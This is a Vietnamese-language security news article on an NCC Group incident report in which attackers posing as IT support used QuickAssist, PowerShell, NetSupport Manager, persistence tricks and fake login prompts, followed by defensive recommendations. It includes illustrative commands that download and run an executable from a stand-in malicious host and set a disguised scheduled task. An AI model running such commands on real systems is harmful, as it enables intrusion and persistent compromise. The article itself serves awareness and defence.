Các chuyên gia bảo mật đang đưa ra cảnh báo về một cuộc tấn công mạng tinh vi sử dụng kỹ thuật social engineering, cho phép kẻ tấn công xâm nhập hệ thống của doanh nghiệp chỉ trong vòng chưa đầy năm phút. Phát hiện này dựa trên một cuộc điều tra ứng phó sự cố gần đây do nhóm Digital Forensics and Incident Response (DFIR) của NCC Group thực hiện.

Phân Tích Chi Tiết Cuộc Tấn Công Social Engineering

Giai Đoạn Tiếp Cận và Khai Thác Ban Đầu

Cuộc tấn công social engineering khởi đầu khi các đối tượng đe dọa giả mạo nhân viên hỗ trợ IT hợp pháp, nhắm mục tiêu vào khoảng hai mươi nhân viên trong một tổ chức. Thông qua các chiến thuật social engineering được dàn dựng cẩn thận, những kẻ tấn công đã thành công thuyết phục hai người dùng cấp quyền truy cập từ xa vào máy trạm của họ.

Kẻ tấn công đã lợi dụng lòng tin và sự thiếu cảnh giác của người dùng để thiết lập kết nối ban đầu. Việc giả mạo vai trò hỗ trợ IT giúp chúng vượt qua các rào cản phòng thủ cơ bản mà không cần khai thác lỗ hổng kỹ thuật phức tạp ngay từ đầu.

Sử Dụng QuickAssist để Xâm Nhập Hệ Thống

Công cụ được kẻ tấn công sử dụng để thiết lập quyền truy cập từ xa là QuickAssist, một công cụ hỗ trợ từ xa tích hợp sẵn trong Windows. Việc sử dụng QuickAssist làm cho việc phát hiện trở nên đặc biệt khó khăn, bởi vì các ứng dụng như vậy thường được sử dụng hợp pháp cho mục đích hỗ trợ IT.

Ngay sau khi nạn nhân cung cấp quyền truy cập, kẻ tấn công đã hành động với tốc độ và độ chính xác đáng báo động. Trong vòng vài phút kể từ khi thiết lập kết nối từ xa, chúng đã thực thi một loạt lệnh PowerShell, nhằm tải xuống các công cụ tấn công, triển khai phần mềm độc hại và thiết lập quyền truy cập bền vững vào các hệ thống bị xâm nhập.

Kỹ Thuật Thực Thi và Duy Trì Truy Cập

Triển Khai Mã Độc qua PowerShell

Phương pháp của kẻ tấn công thể hiện kiến thức kỹ thuật và sự chuẩn bị tinh vi. Chúng ngay lập tức thực thi các script PowerShell để tải về các payload độc hại từ máy chủ bên ngoài. Các file này được ngụy trang dưới dạng các bản cập nhật hệ thống hợp pháp, gây khó khăn cho việc nhận diện bằng các giải pháp bảo mật truyền thống.

Một kỹ thuật đặc biệt khéo léo được phát hiện là việc nhúng mã độc hại vào một file ảnh JPEG tưởng chừng vô hại. Đây là một phương pháp steganography nhằm che giấu payload độc hại trong dữ liệu không đáng ngờ, vượt qua các kiểm tra bảo mật dựa trên chữ ký.

Việc triển khai phần mềm độc hại bao gồm cài đặt NetSupport Manager, một công cụ quản trị từ xa hợp pháp nhưng đã bị vũ khí hóa cho mục đích truy cập trái phép. Kẻ tấn công đã tạo một cấu trúc thư mục ẩn trong thư mục dữ liệu ứng dụng của người dùng và cấu hình phần mềm độc hại tự động thực thi khi hệ thống khởi động. Điều này giúp chúng duy trì sự hiện diện trên hệ thống mà không bị người dùng phát hiện.

Ví dụ về cách PowerShell có thể được sử dụng để tải xuống và thực thi: (Lưu ý: Đây là ví dụ minh họa, không phải mã khai thác thực tế từ báo cáo)

Invoke-WebRequest -Uri "http://malicious.com/payload.exe" -OutFile "C:UsersPublicUpdatessystemupdate.exe"
Start-Process "C:UsersPublicUpdatessystemupdate.exe"

Các lệnh này minh họa cách một file thực thi có thể được tải xuống và chạy một cách bí mật trên hệ thống, thường đi kèm với việc vô hiệu hóa các biện pháp bảo mật hoặc thiết lập các cơ chế ẩn mình.

Cơ Chế Duy Trì Quyền Truy Cập (Persistence)

Để duy trì quyền truy cập lâu dài, các tác nhân đe dọa đã triển khai nhiều cơ chế duy trì quyền truy cập. Chúng tạo các khóa Registry để khởi chạy phần mềm độc hại mỗi khi người dùng đăng nhập vào hệ thống của họ. Việc này đảm bảo rằng mã độc sẽ được kích hoạt mà không cần sự can thiệp của kẻ tấn công sau lần xâm nhập ban đầu.

Ngoài ra, chúng còn thiết lập các tác vụ định kỳ (scheduled tasks) được cấu hình để chạy mỗi năm phút. Điều này đảm bảo rằng quyền truy cập của chúng sẽ sống sót sau khi hệ thống khởi động lại và vượt qua các biện pháp bảo mật cơ bản như xóa tiến trình hoặc khởi động lại máy tính.

Ví dụ về lệnh tạo scheduled task (mang tính minh họa):

schtasks /create /tn "MicrosoftServiceUpdate" /tr "C:UsersPublicUpdatessystemupdate.exe" /sc MINUTE /mo 5 /F

Lệnh trên sẽ tạo một tác vụ tên “MicrosoftServiceUpdate” chạy file thực thi đã tải xuống mỗi 5 phút, đây là một chiến thuật phổ biến trong các cuộc tấn công mạng để duy trì sự bền bỉ.

Kỹ Thuật Thu Thập Thông Tin Đăng Nhập

Có lẽ đáng lo ngại nhất là việc triển khai các công cụ thu thập thông tin đăng nhập (credential harvesting). Kẻ tấn công đã tạo ra các cửa sổ xác thực giả mạo được thiết kế để lừa người dùng nhập thông tin đăng nhập của họ. Các thông tin này sau đó được bí mật lưu trữ trong các file tạm thời để thu thập sau này.

Đây là một bước quan trọng trong chuỗi tấn công, cho phép kẻ tấn công mở rộng phạm vi xâm nhập sang các hệ thống khác trong mạng bằng cách sử dụng các thông tin đăng nhập hợp lệ đã bị đánh cắp. Việc này cũng làm tăng đáng kể rủi ro rò rỉ dữ liệu nhạy cảm của tổ chức.

Thách Thức Trong Phát Hiện và Biện Pháp Phòng Ngừa

Khó Khăn trong Nhận Diện Mối Đe Dọa

Sự việc này làm nổi bật sự tinh vi ngày càng tăng của các cuộc tấn công social engineering và tốc độ mà các mối đe dọa hiện đại có thể xâm phạm an ninh của tổ chức. Việc sử dụng các công cụ hệ thống hợp pháp như QuickAssist làm cho việc phát hiện trở nên đặc biệt thách thức, vì các ứng dụng này thường được sử dụng cho mục đích hỗ trợ IT chính đáng.

Các chuyên gia bảo mật nhấn mạnh rằng vector tấn công này đang trở nên phổ biến hơn. Các tác nhân đe dọa nhận ra rằng tâm lý con người thường đại diện cho mắt xích yếu nhất trong hệ thống an ninh mạng của tổ chức. Sự việc này cho thấy một cuộc tấn công social engineering thành công duy nhất có thể nhanh chóng leo thang thành một sự xâm nhập hệ thống toàn diện.

Nghiên cứu chi tiết về vụ việc có thể được tìm thấy trên blog của NCC Group: Rapid Breach: Social Engineering to Remote Access in 300 Seconds.

Các Khuyến Nghị An Ninh Mạng

Để đối phó với những mối đe dọa này, các tổ chức được khuyến nghị thực hiện các biện pháp sau:

• Thêm các quy trình xác minh bổ sung cho các yêu cầu hỗ trợ từ xa. Điều này bao gồm việc yêu cầu xác nhận qua kênh liên lạc thứ cấp (ví dụ: điện thoại) hoặc qua quản lý cấp trên trước khi cấp quyền truy cập.
• Nâng cao đào tạo nhận thức về bảo mật cho nhân viên. Các buổi đào tạo cần tập trung vào việc nhận diện các dấu hiệu của tấn công social engineering, nhấn mạnh tầm quan trọng của việc không chia sẻ thông tin đăng nhập hoặc cấp quyền truy cập không xác minh.
• Triển khai các hệ thống phát hiện điểm cuối nâng cao (EDR) có khả năng nhận diện hoạt động PowerShell đáng ngờ và các công cụ truy cập từ xa trái phép. EDR có thể giám sát hành vi của ứng dụng và phát hiện các chuỗi lệnh bất thường mà các giải pháp diệt virus truyền thống có thể bỏ qua.
• Áp dụng nguyên tắc đặc quyền tối thiểu (Least Privilege) cho tất cả tài khoản người dùng và hệ thống. Điều này hạn chế thiệt hại trong trường hợp một tài khoản bị xâm nhập.
• Thường xuyên cập nhật bản vá bảo mật cho hệ điều hành và tất cả ứng dụng. Mặc dù cuộc tấn công này không dựa vào lỗ hổng chưa vá, việc duy trì hệ thống được cập nhật là nền tảng của mọi chiến lược bảo mật thông tin hiệu quả.

Thời gian thực thi nhanh chóng của cuộc tấn công này là một lời nhắc nhở rõ ràng rằng các mối đe dọa mạng hiện đại có thể đạt được sự xâm nhập đáng kể chỉ trong vài phút, không phải vài giờ hay vài ngày. Việc đầu tư vào khả năng phòng thủ và phản ứng nhanh chóng là yếu tố then chốt để bảo vệ tổ chức khỏi các cuộc tấn công mạng ngày càng phức tạp.